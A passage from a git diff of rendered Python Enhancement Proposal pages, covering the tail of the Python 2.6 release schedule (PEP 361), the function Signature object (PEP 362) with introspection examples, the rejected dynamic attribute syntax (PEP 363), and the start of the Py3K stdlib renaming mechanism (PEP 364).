  • PEP 3127: Integer Literal Support and Syntax
  • +
  • PEP 371: Addition of the multiprocessing package
  • +
+

New modules in the standard library:

+
    +
  • json
  • +
  • new enhanced turtle module
  • +
  • ast
  • +
+

Deprecated modules and functions in the standard library:

+
    +
  • buildtools
  • +
  • cfmfile
  • +
  • commands.getstatus()
  • +
  • macostools.touched()
  • +
  • md5
  • +
  • MimeWriter
  • +
  • mimify
  • +
  • popen2, os.popen[234]()
  • +
  • posixfile
  • +
  • sets
  • +
  • sha
  • +
+

Modules removed from the standard library:

+
    +
  • gopherlib
  • +
  • rgbimg
  • +
  • macfs
  • +
+

Warnings for features removed in Py3k:

+
    +
  • builtins: apply, callable, coerce, dict.has_key, execfile, +reduce, reload
  • +
  • backticks and <>
  • +
  • float args to xrange
  • +
  • coerce and all its friends
  • +
  • comparing by default comparison
  • +
  • {}.has_key()
  • +
  • file.xreadlines
  • +
  • softspace removal for print() function
  • +
  • removal of modules because of PEP 4/PEP 3100/PEP 3108
  • +
+

Other major features:

+
    +
  • with/as will be keywords
  • +
  • a __dir__() special method to control dir() was added [1]
  • +
  • AtheOS support stopped.
  • +
  • warnings module implemented in C
  • +
  • compile() takes an AST and can convert to byte code
  • +
+
+
+

Possible features for 2.6

+

New features should be implemented prior to alpha2, particularly +any C modifications or behavioral changes. New features must be +implemented prior to beta1 or will require Release Manager approval.

+

The following PEPs are being worked on for inclusion in 2.6: None.

+

Each non-trivial feature listed here that is not a PEP must be +discussed on python-dev. Other enhancements include:

+
    +
  • distutils replacement (requires a PEP)
  • +
+

New modules in the standard library:

+ +

PJE’s withdrawal from 2.5 for inclusion in 2.6: +https://mail.python.org/pipermail/python-dev/2006-April/064145.html

+

Modules to gain a DeprecationWarning (as specified for Python 2.6 +or through negligence):

+
    +
  • rfc822
  • +
  • mimetools
  • +
  • multifile
  • +
  • compiler package (or a Py3K warning instead?)
  • +
  • Convert Parser/*.c to use the C warnings module rather than printf
  • +
  • Add warnings for Py3k features removed:
      +
    • __getslice__/__setslice__/__delslice__
    • +
    • float args to PyArgs_ParseTuple
    • +
    • __cmp__?
    • +
    • other comparison changes?
    • +
    • int division?
    • +
    • All PendingDeprecationWarnings (e.g. exceptions)
    • +
    • using zip() result as a list
    • +
    • the exec statement (use function syntax)
    • +
    • function attributes that start with func_* (should use __*__)
    • +
    • the L suffix for long literals
    • +
    • renaming of __nonzero__ to __bool__
    • +
    • multiple inheritance with classic classes? (MRO might change)
    • +
    • properties and classic classes? (instance attrs shadow property)
    • +
    +
  • +
  • use __bool__ method if available and there’s no __nonzero__
  • +
  • Check the various bits of code in Demo/ and Tools/ all still work, +update or remove the ones that don’t.
  • +
  • All modules in Modules/ should be updated to be ssize_t clean.
  • +
  • All of Python (including Modules/) should compile cleanly with g++
  • +
  • Start removing deprecated features and generally moving towards Py3k
  • +
  • Replace all old style tests (operate on import) with unittest or doctest
  • +
  • Add tests for all untested modules
  • +
  • Document undocumented modules/features
  • +
  • bdist_deb in distutils package +https://mail.python.org/pipermail/python-dev/2006-February/060926.html
  • +
  • bdist_egg in distutils package
  • +
  • pure python pgen module +(Owner: Guido) +Deferral to 2.6: +https://mail.python.org/pipermail/python-dev/2006-April/064528.html
  • +
  • Remove the fpectl module?
  • +
+
+
+

Deferred until 2.7

+

None

+
+
+

Open issues

+

How should import warnings be handled?

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0361.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0362/index.html b/pep-0362/index.html new file mode 100644 index 00000000000..3fc8f4cf844 --- /dev/null +++ b/pep-0362/index.html @@ -0,0 +1,690 @@ + + + + + + + + PEP 362 – Function Signature Object | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 362 – Function Signature Object

+
+
Author:
+
Brett Cannon <brett at python.org>, Jiwon Seo <seojiwon at gmail.com>, +Yury Selivanov <yury at edgedb.com>, Larry Hastings <larry at hastings.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
21-Aug-2006
+
Python-Version:
+
3.3
+
Post-History:
+
04-Jun-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Python has always supported powerful introspection capabilities, +including introspecting functions and methods (for the rest of +this PEP, “function” refers to both functions and methods). By +examining a function object you can fully reconstruct the function’s +signature. Unfortunately this information is stored in an inconvenient +manner, and is spread across a half-dozen deeply nested attributes.

+

This PEP proposes a new representation for function signatures. +The new representation contains all necessary information about a function +and its parameters, and makes introspection easy and straightforward.

+

However, this object does not replace the existing function +metadata, which is used by Python itself to execute those +functions. The new metadata object is intended solely to make +function introspection easier for Python programmers.

+
+
+

Signature Object

+

A Signature object represents the call signature of a function and +its return annotation. For each parameter accepted by the function +it stores a Parameter object in its parameters collection.

+

A Signature object has the following public attributes and methods:

+
    +
  • +
    return_annotation : object
    The “return” annotation for the function. If the function +has no “return” annotation, this attribute is set to +Signature.empty.
    +
    +
  • +
  • +
    parameters : OrderedDict
    An ordered mapping of parameters’ names to the corresponding +Parameter objects.
    +
    +
  • +
  • +
    bind(*args, **kwargs) -> BoundArguments
    Creates a mapping from positional and keyword arguments to +parameters. Raises a TypeError if the passed arguments do +not match the signature.
    +
    +
  • +
  • +
    bind_partial(*args, **kwargs) -> BoundArguments
    Works the same way as bind(), but allows the omission of some required arguments (mimics functools.partial behavior). Raises a TypeError if the passed arguments do not match the signature. A short illustration follows this list.
    +
    +
  • +
  • +
    replace(parameters=<optional>, *, return_annotation=<optional>) -> Signature
    Creates a new Signature instance based on the instance +replace was invoked on. It is possible to pass different +parameters and/or return_annotation to override the +corresponding properties of the base signature. To remove +return_annotation from the copied Signature, pass in +Signature.empty.

    Note that the ‘=<optional>’ notation means that the argument is optional. This notation applies to the rest of this PEP.

    +
    +
    +
  • +
+
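A minimal sketch of the difference between bind() and bind_partial(), using the signature() function described later in this PEP (connect is a placeholder function):

from inspect import signature

def connect(host, port, *, timeout=None):
    pass

sig = signature(connect)

ba = sig.bind('localhost', 8080)    # all required arguments supplied
# ba.arguments -> {'host': 'localhost', 'port': 8080}

ba = sig.bind_partial('localhost')  # 'port' may be supplied later
# ba.arguments -> {'host': 'localhost'}

# sig.bind('localhost') would raise TypeError: 'port' is missing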

Signature objects are immutable. Use Signature.replace() to +make a modified copy:

+
>>> def foo() -> None:
+...     pass
+>>> sig = signature(foo)
+
+>>> new_sig = sig.replace(return_annotation="new return annotation")
+>>> new_sig is not sig
+True
+>>> new_sig.return_annotation != sig.return_annotation
+True
+>>> new_sig.parameters == sig.parameters
+True
+
+>>> new_sig = new_sig.replace(return_annotation=new_sig.empty)
+>>> new_sig.return_annotation is Signature.empty
+True
+
+
+

There are two ways to instantiate a Signature class:

+
    +
  • +
    Signature(parameters=<optional>, *, return_annotation=Signature.empty)
    Default Signature constructor. Accepts an optional sequence +of Parameter objects, and an optional return_annotation. +Parameters sequence is validated to check that there are no +parameters with duplicate names, and that the parameters +are in the right order, i.e. positional-only first, then +positional-or-keyword, etc.
    +
    +
  • +
  • +
    Signature.from_function(function)
    Returns a Signature object reflecting the signature of the +function passed in.
    +
    +
  • +
+

It’s possible to test Signatures for equality. Two signatures are +equal when their parameters are equal, their positional and +positional-only parameters appear in the same order, and they +have equal return annotations.
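For example, a sketch of these equality rules (f, g and h are placeholders):

from inspect import signature

def f(a, b=0) -> int: ...
def g(a, b=0) -> int: ...
def h(b, a=0) -> int: ...

assert signature(f) == signature(g)   # same names, kinds, defaults, annotation
assert signature(f) != signature(h)   # parameter names appear in a different order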

+

Changes to the Signature object, or to any of its data members, +do not affect the function itself.

+

Signature also implements __str__:

+
>>> str(Signature.from_function((lambda *args: None)))
+'(*args)'
+
+>>> str(Signature())
+'()'
+
+
+
+
+

Parameter Object

+

Python’s expressive syntax means functions can accept many different +kinds of parameters with many subtle semantic differences. We +propose a rich Parameter object designed to represent any possible +function parameter.

+

A Parameter object has the following public attributes and methods:

+
    +
  • +
    name : str
    The name of the parameter as a string. Must be a valid +python identifier name (with the exception of POSITIONAL_ONLY +parameters, which can have it set to None.)
    +
    +
  • +
  • +
    default : object
    The default value for the parameter. If the parameter has no +default value, this attribute is set to Parameter.empty.
    +
    +
  • +
  • +
    annotation : object
    The annotation for the parameter. If the parameter has no +annotation, this attribute is set to Parameter.empty.
    +
    +
  • +
  • +
    kind
    Describes how argument values are bound to the parameter. +Possible values:
      +
    • Parameter.POSITIONAL_ONLY - value must be supplied +as a positional argument.

      Python has no explicit syntax for defining positional-only +parameters, but many built-in and extension module functions +(especially those that accept only one or two parameters) +accept them.

      +
    • +
    • Parameter.POSITIONAL_OR_KEYWORD - value may be +supplied as either a keyword or positional argument +(this is the standard binding behaviour for functions +implemented in Python.)
    • +
    • Parameter.KEYWORD_ONLY - value must be supplied +as a keyword argument. Keyword only parameters are those +which appear after a “*” or “*args” entry in a Python +function definition.
    • +
    • Parameter.VAR_POSITIONAL - a tuple of positional +arguments that aren’t bound to any other parameter. +This corresponds to a “*args” parameter in a Python +function definition.
    • +
    • Parameter.VAR_KEYWORD - a dict of keyword arguments +that aren’t bound to any other parameter. This corresponds +to a “**kwargs” parameter in a Python function definition.
    • +
    +

    Always use Parameter.* constants for setting and checking +value of the kind attribute.

    +
    +
    +
  • +
  • +
    replace(*, name=<optional>, kind=<optional>, default=<optional>, annotation=<optional>) -> Parameter
    Creates a new Parameter instance based on the instance replace was invoked on. To override a Parameter attribute, pass the corresponding argument. To remove an attribute from a Parameter, pass Parameter.empty.
    +
    +
  • +
+

Parameter constructor:

+
    +
  • +
    Parameter(name, kind, *, annotation=Parameter.empty, default=Parameter.empty)
    Instantiates a Parameter object. name and kind are required, +while annotation and default are optional.
    +
    +
  • +
+

Two parameters are equal when they have equal names, kinds, defaults, +and annotations.

+

Parameter objects are immutable. Instead of modifying a Parameter object, +you can use Parameter.replace() to create a modified copy like so:

+
>>> param = Parameter('foo', Parameter.KEYWORD_ONLY, default=42)
+>>> str(param)
+'foo=42'
+
+>>> str(param.replace())
+'foo=42'
+
+>>> str(param.replace(default=Parameter.empty, annotation='spam'))
+"foo:'spam'"
+
+
+
+
+

BoundArguments Object

+

Result of a Signature.bind call. Holds the mapping of arguments +to the function’s parameters.

+

Has the following public attributes:

+
    +
  • +
    arguments : OrderedDict
    An ordered, mutable mapping of parameters’ names to arguments’ values. +Contains only explicitly bound arguments. Arguments for +which bind() relied on a default value are skipped.
    +
    +
  • +
  • +
    args : tuple
    Tuple of positional arguments values. Dynamically computed from +the ‘arguments’ attribute.
    +
    +
  • +
  • +
    kwargs : dict
    Dict of keyword arguments values. Dynamically computed from +the ‘arguments’ attribute.
    +
    +
  • +
+

The arguments attribute should be used in conjunction with +Signature.parameters for any arguments processing purposes.

+

args and kwargs properties can be used to invoke functions:

+
def test(a, *, b):
+    ...
+
+sig = signature(test)
+ba = sig.bind(10, b=20)
+test(*ba.args, **ba.kwargs)
+
+
+

Arguments which could be passed as part of either *args or **kwargs +will be included only in the BoundArguments.args attribute. Consider the +following example:

+
def test(a=1, b=2, c=3):
+    pass
+
+sig = signature(test)
+ba = sig.bind(a=10, c=13)
+
+>>> ba.args
+(10,)
+
+>>> ba.kwargs
+{'c': 13}
+
+
+
+
+

Implementation

+

The implementation adds a new function signature() to the inspect +module. The function is the preferred way of getting a Signature for +a callable object.

+

The function implements the following algorithm:

+
    +
  • If the object is not callable - raise a TypeError
  • +
  • If the object has a __signature__ attribute and if it +is not None - return it
  • +
  • If it has a __wrapped__ attribute, return +signature(object.__wrapped__)
  • +
  • If the object is an instance of FunctionType, construct +and return a new Signature for it
  • +
  • If the object is a bound method, construct and return a new Signature +object, with its first parameter (usually self or cls) +removed. (classmethod and staticmethod are supported +too. Since both are descriptors, the former returns a bound method, +and the latter returns its wrapped function.)
  • +
  • If the object is an instance of functools.partial, construct +a new Signature from its partial.func attribute, and +account for already bound partial.args and partial.kwargs
  • +
  • If the object is a class or metaclass:
      +
    • If the object’s type has a __call__ method defined in +its MRO, return a Signature for it
    • +
    • If the object has a __new__ method defined in its MRO, +return a Signature object for it
    • +
    • If the object has a __init__ method defined in its MRO, +return a Signature object for it
    • +
    +
  • +
  • Return signature(object.__call__)
  • +
+

Note that the Signature object is created in a lazy manner, and +is not automatically cached. However, the user can manually cache a +Signature by storing it in the __signature__ attribute.
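For instance, a sketch of such manual caching (frobnicate is a placeholder):

import inspect

def frobnicate(a, b=1):
    pass

# Compute the Signature once and store it; signature() will return the
# __signature__ attribute whenever it is set.
frobnicate.__signature__ = inspect.signature(frobnicate)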

+

An implementation for Python 3.3 can be found at [1]. +The python issue tracking the patch is [2].

+
+
+

Design Considerations

+
+

No implicit caching of Signature objects

+

The first PEP design had a provision for implicit caching of Signature +objects in the inspect.signature() function. However, this has the +following downsides:

+
    +
  • If the Signature object is cached then any changes to the function it describes will not be reflected in it. However, if the caching is needed, it can always be done manually and explicitly
  • +
  • It is better to reserve the __signature__ attribute for the cases when there is a need to explicitly set it to a Signature object that is different from the actual one
  • +
+
+
+

Some functions may not be introspectable

+

Some functions may not be introspectable in certain implementations of +Python. For example, in CPython, built-in functions defined in C provide +no metadata about their arguments. Adding support for them is out of +scope for this PEP.

+
+
+

Signature and Parameter equivalence

+

We assume that parameter names have semantic significance–two +signatures are equal only when their corresponding parameters are equal +and have the exact same names. Users who want looser equivalence tests, +perhaps ignoring names of VAR_KEYWORD or VAR_POSITIONAL parameters, will +need to implement those themselves.

+
+
+
+

Examples

+
+

Visualizing Callable Objects’ Signature

+

Let’s define some classes and functions:

+
from inspect import signature
+from functools import partial, wraps
+
+
+class FooMeta(type):
+    def __new__(mcls, name, bases, dct, *, bar:bool=False):
+        return super().__new__(mcls, name, bases, dct)
+
+    def __init__(cls, name, bases, dct, **kwargs):
+        return super().__init__(name, bases, dct)
+
+
+class Foo(metaclass=FooMeta):
+    def __init__(self, spam:int=42):
+        self.spam = spam
+
+    def __call__(self, a, b, *, c) -> tuple:
+        return a, b, c
+
+    @classmethod
+    def spam(cls, a):
+        return a
+
+
+def shared_vars(*shared_args):
+    """Decorator factory that defines shared variables that are
+       passed to every invocation of the function"""
+
+    def decorator(f):
+        @wraps(f)
+        def wrapper(*args, **kwargs):
+            full_args = shared_args + args
+            return f(*full_args, **kwargs)
+
+        # Override signature
+        sig = signature(f)
+        sig = sig.replace(tuple(sig.parameters.values())[1:])
+        wrapper.__signature__ = sig
+
+        return wrapper
+    return decorator
+
+
+@shared_vars({})
+def example(_state, a, b, c):
+    return _state, a, b, c
+
+
+def format_signature(obj):
+    return str(signature(obj))
+
+
+

Now, in the python REPL:

+
>>> format_signature(FooMeta)
+'(name, bases, dct, *, bar:bool=False)'
+
+>>> format_signature(Foo)
+'(spam:int=42)'
+
+>>> format_signature(Foo.__call__)
+'(self, a, b, *, c) -> tuple'
+
+>>> format_signature(Foo().__call__)
+'(a, b, *, c) -> tuple'
+
+>>> format_signature(Foo.spam)
+'(a)'
+
+>>> format_signature(partial(Foo().__call__, 1, c=3))
+'(b, *, c=3) -> tuple'
+
+>>> format_signature(partial(partial(Foo().__call__, 1, c=3), 2, c=20))
+'(*, c=20) -> tuple'
+
+>>> format_signature(example)
+'(a, b, c)'
+
+>>> format_signature(partial(example, 1, 2))
+'(c)'
+
+>>> format_signature(partial(partial(example, 1, b=2), c=3))
+'(b=2, c=3)'
+
+
+
+
+

Annotation Checker

+
import inspect
+import functools
+
+def checktypes(func):
+    '''Decorator to verify arguments and return types
+
+    Example:
+
+        >>> @checktypes
+        ... def test(a:int, b:str) -> int:
+        ...     return int(a * b)
+
+        >>> test(10, '1')
+        1111111111
+
+        >>> test(10, 1)
+        Traceback (most recent call last):
+          ...
+        ValueError: test: wrong type of 'b' argument, 'str' expected, got 'int'
+    '''
+
+    sig = inspect.signature(func)
+
+    types = {}
+    for param in sig.parameters.values():
+        # Iterate through function's parameters and build the list of
+        # arguments types
+        type_ = param.annotation
+        if type_ is param.empty or not inspect.isclass(type_):
+            # Missing annotation or not a type, skip it
+            continue
+
+        types[param.name] = type_
+
+        # If the argument has a type specified, let's check that its
+        # default value (if present) conforms with the type.
+        if param.default is not param.empty and not isinstance(param.default, type_):
+            raise ValueError("{func}: wrong type of a default value for {arg!r}". \
+                             format(func=func.__qualname__, arg=param.name))
+
+    def check_type(sig, arg_name, arg_type, arg_value):
+        # Internal function that encapsulates arguments type checking
+        if not isinstance(arg_value, arg_type):
+            raise ValueError("{func}: wrong type of {arg!r} argument, " \
+                             "{exp!r} expected, got {got!r}". \
+                             format(func=func.__qualname__, arg=arg_name,
+                                    exp=arg_type.__name__, got=type(arg_value).__name__))
+
+    @functools.wraps(func)
+    def wrapper(*args, **kwargs):
+        # Let's bind the arguments
+        ba = sig.bind(*args, **kwargs)
+        for arg_name, arg in ba.arguments.items():
+            # And iterate through the bound arguments
+            try:
+                type_ = types[arg_name]
+            except KeyError:
+                continue
+            else:
+                # OK, we have a type for the argument, lets get the corresponding
+                # parameter description from the signature object
+                param = sig.parameters[arg_name]
+                if param.kind == param.VAR_POSITIONAL:
+                    # If this parameter is a variable-argument parameter,
+                    # then we need to check each of its values
+                    for value in arg:
+                        check_type(sig, arg_name, type_, value)
+                elif param.kind == param.VAR_KEYWORD:
+                    # If this parameter is a variable-keyword-argument parameter:
+                    for subname, value in arg.items():
+                        check_type(sig, arg_name + ':' + subname, type_, value)
+                else:
+                    # And, finally, if this parameter a regular one:
+                    check_type(sig, arg_name, type_, arg)
+
+        result = func(*ba.args, **ba.kwargs)
+
+        # The last bit - let's check that the result is correct
+        return_type = sig.return_annotation
+        if (return_type is not sig.empty and
+                isinstance(return_type, type) and
+                not isinstance(result, return_type)):
+
+            raise ValueError('{func}: wrong return type, {exp} expected, got {got}'. \
+                             format(func=func.__qualname__, exp=return_type.__name__,
+                                    got=type(result).__name__))
+        return result
+
+    return wrapper
+
+
+
+
+
+

Acceptance

+

PEP 362 was accepted by Guido on Friday, June 22, 2012 [3]. The reference implementation was committed to trunk later that day.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0362.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0363/index.html b/pep-0363/index.html new file mode 100644 index 00000000000..7332810c86c --- /dev/null +++ b/pep-0363/index.html @@ -0,0 +1,370 @@ + + + + + + + + PEP 363 – Syntax For Dynamic Attribute Access | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 363 – Syntax For Dynamic Attribute Access

+
+
Author:
+
Ben North <ben at redfrontdoor.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Jan-2007
+
Post-History:
+
12-Feb-2007
+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+


+

See Mailing Lists Discussion for more information.

+

+
+
+

Abstract

+

Dynamic attribute access is currently possible using the “getattr” +and “setattr” builtins. The present PEP suggests a new syntax to +make such access easier, allowing the coder for example to write:

+
x.('foo_%d' % n) += 1
+
+z = y.('foo_%d' % n).('bar_%s' % s)
+
+
+

instead of:

+
attr_name = 'foo_%d' % n
+setattr(x, attr_name, getattr(x, attr_name) + 1)
+
+z = getattr(getattr(y, 'foo_%d' % n), 'bar_%s' % s)
+
+
+
+
+

Rationale

+

Dictionary access and indexing both have a friendly invocation +syntax: instead of x.__getitem__(12) the coder can write x[12]. +This also allows the use of subscripted elements in an augmented +assignment, as in “x[12] += 1”. The present proposal brings this +ease-of-use to dynamic attribute access too.

+

Attribute access is currently possible in two ways:

+
    +
  • When the attribute name is known at code-writing time, the +“.NAME” trailer can be used, as in:
    x.foo = 42
    +y.bar += 100
    +
    +
    +
  • +
  • When the attribute name is computed dynamically at run-time, the +“getattr” and “setattr” builtins must be used:
    x = getattr(y, 'foo_%d' % n)
    +setattr(z, 'bar_%s' % s, 99)
    +
    +
    +

    The “getattr” builtin also allows the coder to specify a default +value to be returned in the event that the object does not have +an attribute of the given name:

    +
    x = getattr(y, 'foo_%d' % n, 0)
    +
    +
    +
  • +
+

This PEP describes a new syntax for dynamic attribute access — +“x.(expr)” — with examples given in the Abstract above.

+

(The new syntax could also allow the provision of a default value in +the “get” case, as in:

+
x = y.('foo_%d' % n, None)
+
+
+

This 2-argument form of dynamic attribute access would not be +permitted as the target of an (augmented or normal) assignment. The +“Discussion” section below includes opinions specifically on the +2-argument extension.)

+

Finally, the new syntax can be used with the “del” statement, as in:

+
del x.(attr_name)
+
+
+
+
+

Impact On Existing Code

+

The proposed new syntax is not currently valid, so no existing +well-formed programs have their meaning altered by this proposal.

+

Across all “*.py” files in the 2.5 distribution, there are around +600 uses of “getattr”, “setattr” or “delattr”. They break down as +follows (figures have some room for error because they were +arrived at by partially-manual inspection):

+
c.300 uses of plain "getattr(x, attr_name)", which could be
+      replaced with the new syntax;
+
+c.150 uses of the 3-argument form, i.e., with the default
+      value; these could be replaced with the 2-argument form
+      of the new syntax (the cases break down into c.125 cases
+      where the attribute name is a literal string, and c.25
+      where it's only known at run-time);
+
+c.5   uses of the 2-argument form with a literal string
+      attribute name, which I think could be replaced with the
+      standard "x.attribute" syntax;
+
+c.120 uses of setattr, of which 15 use getattr to find the
+      new value; all could be replaced with the new syntax,
+      the 15 where getattr is also involved would show a
+      particular increase in clarity;
+
+c.5   uses which would have to stay as "getattr" because they
+      are calls of a variable named "getattr" whose default
+      value is the builtin "getattr";
+
+c.5   uses of the 2-argument form, inside a try/except block
+      which catches AttributeError and uses a default value
+      instead; these could use 2-argument form of the new
+      syntax;
+
+c.10  uses of "delattr", which could use the new syntax.
+
+
+

As examples, the line:

+
setattr(self, attr, change_root(self.root, getattr(self, attr)))
+
+
+

from Lib/distutils/command/install.py could be rewritten:

+
self.(attr) = change_root(self.root, self.(attr))
+
+
+

and the line:

+
setattr(self, method_name, getattr(self.metadata, method_name))
+
+
+

from Lib/distutils/dist.py could be rewritten:

+
self.(method_name) = self.metadata.(method_name)
+
+
+
+
+

Performance Impact

+

Initial pystone measurements are inconclusive, but suggest there may +be a performance penalty of around 1% in the pystones score with the +patched version. One suggestion is that this is because the longer +main loop in ceval.c hurts the cache behaviour, but this has not +been confirmed.

+

On the other hand, measurements suggest a speed-up of around 40–45% +for dynamic attribute access.

+
+
+

Error Cases

+

Only strings are permitted as attribute names, so for instance the +following error is produced:

+
>>> x.(99) = 8
+   Traceback (most recent call last):
+     File "<stdin>", line 1, in <module>
+   TypeError: attribute name must be string, not 'int'
+
+
+

This is handled by the existing PyObject_GetAttr function.

+
+
+

Draft Implementation

+

A draft implementation adds a new alternative to the “trailer” +clause in Grammar/Grammar; a new AST type, “DynamicAttribute” in +Python.asdl, with accompanying changes to symtable.c, ast.c, and +compile.c, and three new opcodes (load/store/del) with +accompanying changes to opcode.h and ceval.c. The patch consists +of c.180 additional lines in the core code, and c.100 additional +lines of tests. It is available as sourceforge patch #1657573 [1].

+
+
+

Mailing Lists Discussion

+

Initial posting of this PEP in draft form was to python-ideas on +20070209 [2], and the response was generally positive. The PEP was +then posted to python-dev on 20070212 [3], and an interesting +discussion ensued. A brief summary:

+

Initially, there was reasonable (but not unanimous) support for the +idea, although the precise choice of syntax had a more mixed +reception. Several people thought the “.” would be too easily +overlooked, with the result that the syntax could be confused with a +method/function call. A few alternative syntaxes were suggested:

+
obj.(foo)
+obj.[foo]
+obj.{foo}
+obj{foo}
+obj.*foo
+obj->foo
+obj<-foo
+obj@[foo]
+obj.[[foo]]
+
+
+

with “obj.[foo]” emerging as the preferred one. In this initial +discussion, the two-argument form was universally disliked, so it +was to be taken out of the PEP.

+

Discussion then took a step back to whether this particular feature +provided enough benefit to justify new syntax. As well as requiring +coders to become familiar with the new syntax, there would also be +the problem of backward compatibility — code using the new syntax +would not run on older pythons.

+

Instead of new syntax, a new “wrapper class” was proposed, with the +following specification / conceptual implementation suggested by +Martin von Löwis:

+
class attrs:
+   def __init__(self, obj):
+     self.obj = obj
+   def __getitem__(self, name):
+     return getattr(self.obj, name)
+   def __setitem__(self, name, value):
+     return setattr(self.obj, name, value)
+   def __delitem__(self, name):
+     return delattr(self.obj, name)
+   def __contains__(self, name):
+     return hasattr(self.obj, name)
+
+
+

This was considered a cleaner and more elegant solution to the +original problem. (Another suggestion was a mixin class providing +dictionary-style access to an object’s attributes.)
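With such a wrapper, the examples from the Abstract could be written along these lines (sketch):

a = attrs(x)
a['foo_%d' % n] += 1             # instead of x.('foo_%d' % n) += 1

z = attrs(attrs(y)['foo_%d' % n])['bar_%s' % s]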

+

The decision was made that the present PEP did not meet the burden +of proof for the introduction of new syntax, a view which had been +put forward by some from the beginning of the discussion. The +wrapper class idea was left open as a possibility for a future PEP.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0363.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0364/index.html b/pep-0364/index.html new file mode 100644 index 00000000000..a73b15008a6 --- /dev/null +++ b/pep-0364/index.html @@ -0,0 +1,347 @@ + + + + + + + + PEP 364 – Transitioning to the Py3K Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 364 – Transitioning to the Py3K Standard Library

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
01-Mar-2007
+
Python-Version:
+
2.6
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 3108 describes the reorganization of the Python standard library +for the Python 3.0 release. This PEP describes a +mechanism for transitioning from the Python 2.x standard library to +the Python 3.0 standard library. This transition will allow and +encourage Python programmers to use the new Python 3.0 library names +starting with Python 2.6, while maintaining the old names for backward +compatibility. In this way, a Python programmer will be able to write +forward compatible code without sacrificing interoperability with +existing Python programs.

+
+
+

Rationale

+

PEP 3108 presents a rationale for Python standard library (stdlib) +reorganization. The reader is encouraged to consult that PEP for +details about why and how the library will be reorganized. Should +PEP 3108 be accepted in part or in whole, then it is advantageous to +allow Python programmers to begin the transition to the new stdlib +module names in Python 2.x, so that they can write forward compatible +code starting with Python 2.6.

+

Note that PEP 3108 proposes to remove some “silly old stuff”, +i.e. modules that are no longer useful or necessary. The PEP you are +reading does not address this because there are no forward +compatibility issues for modules that are to be removed, except to +stop using such modules.

+

This PEP concerns only the mechanism by which mappings from old stdlib +names to new stdlib names are maintained. Please consult PEP 3108 for +all specific module renaming proposals. Specifically see the section +titled Modules to Rename for guidelines on the old name to new +name mappings. The few examples in this PEP are given for +illustrative purposes only and should not be used for specific +renaming recommendations.

+
+
+

Supported Renamings

+

There are at least 4 use cases explicitly supported by this PEP:

+
    +
  • Simple top-level package name renamings, such as StringIO to +stringio;
  • +
  • Sub-package renamings where the package name may or may not be +renamed, such as email.MIMEText to email.mime.text;
  • +
  • Extension module renaming, such as cStringIO to cstringio;
  • +
  • Third party renaming of any of the above.
  • +
+

Two use cases supported by this PEP include renaming simple top-level +modules, such as StringIO, as well as modules within packages, +such as email.MIMEText.

+

In the former case, PEP 3108 currently recommends StringIO be +renamed to stringio, following PEP 8 recommendations.

+

In the latter case, the email 4.0 package distributed with Python 2.5 +already renamed email.MIMEText to email.mime.text, although it +did so in a one-off, uniquely hackish way inside the email package. +The mechanism described in this PEP is general enough to handle all +module renamings, obviating the need for the Python 2.5 hack (except +for backward compatibility with earlier Python versions).

+

An additional use case is to support the renaming of C extension +modules. As long as the new name for the C module is importable, it +can be remapped to the new name. E.g. cStringIO renamed to +cstringio.

+

Third party package renaming is also supported, via several public +interfaces accessible by any Python module.

+

Remappings are not performed recursively.

+
+
+

.mv files

+

Remapping files are called .mv files; the suffix was chosen to be +evocative of the Unix mv(1) command. An .mv file is a simple +line-oriented text file. All blank lines and lines that start with a +# are ignored. All other lines must contain two whitespace separated +fields. The first field is the old module name, and the second field +is the new module name. Both module names must be specified using +their full dotted-path names. Here is an example .mv file from +Python 2.6:

+
# Map the various string i/o libraries to their new names
+StringIO    stringio
+cStringIO   cstringio
+
+
+

.mv files can appear anywhere in the file system, and there is a +programmatic interface provided to parse them, and register the +remappings inside them. By default, when Python starts up, all the +.mv files in the oldlib package are read, and their remappings +are automatically registered. This is where all the module remappings +should be specified for top-level Python 2.x standard library modules.

+
+
+

Implementation Specification

+

This section provides the full specification for how module renamings +in Python 2.x are implemented. The central mechanism relies on +various import hooks as described in PEP 302. Specifically +sys.path_importer_cache, sys.path, and sys.meta_path are +all employed to provide the necessary functionality.

+

When Python’s import machinery is initialized, the oldlib package is +imported. Inside oldlib there is a class called OldStdlibLoader. +This class implements the PEP 302 interface and is automatically +instantiated, with zero arguments. The constructor reads all the +.mv files from the oldlib package directory, automatically +registering all the remappings found in those .mv files. This is +how the Python 2.x standard library is remapped.

+

The OldStdlibLoader class should not be instantiated by other Python +modules. Instead, you can access the global OldStdlibLoader instance +via the sys.stdlib_remapper instance. Use this instance if you want +programmatic access to the remapping machinery.

+

